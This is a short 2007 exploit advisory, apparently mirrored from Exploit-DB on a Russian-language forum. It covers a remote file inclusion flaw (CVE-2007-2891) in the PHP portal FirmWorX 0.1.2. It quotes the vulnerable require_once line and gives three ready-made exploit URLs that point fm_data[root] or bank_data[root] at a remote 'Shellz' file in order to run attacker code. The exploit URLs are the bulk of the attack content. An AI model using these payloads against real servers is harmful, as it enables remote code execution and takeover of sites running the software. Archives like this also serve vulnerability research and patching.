- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3983
- Проверка EDB
-
- Пройдено
- Автор
- DELTAHACKINGTEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2891
- Дата публикации
- 2007-05-24
Код:
**********************************************************************************************************
DeltaSecurityTEAM
WwW.DeltaSecurity.iR
**********************************************************************************************************
* Portal Name = FirmWorX 0.1.2
* Class = Remote File Inclusion
* Risk = High (Remote File Execution)
* Download = http://firmworx.sourceforge.net
* Discoverd By = DeltahackingTEAM
* User In Delta Team = Dav00d_Cracker
* Conatact = [email protected]
--------------------------------------------------------------------------------------------
Vulnerability C0de :
require_once($fm_data['root']."/includes/config/db.inc.php");
--------------------------------------------------------------------------------------------
- Expl0it:
http://localhost/[PATH]/includes/config/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/includes/functions/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/modules/bank/includes/design/main.inc.php?bank_data[root]=Shellz?
--------------------------------------------------------------------------------------------
Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , And all I
**********************************************************************************************************
# milw0rm.com [2007-05-24]- Источник
- www.exploit-db.com
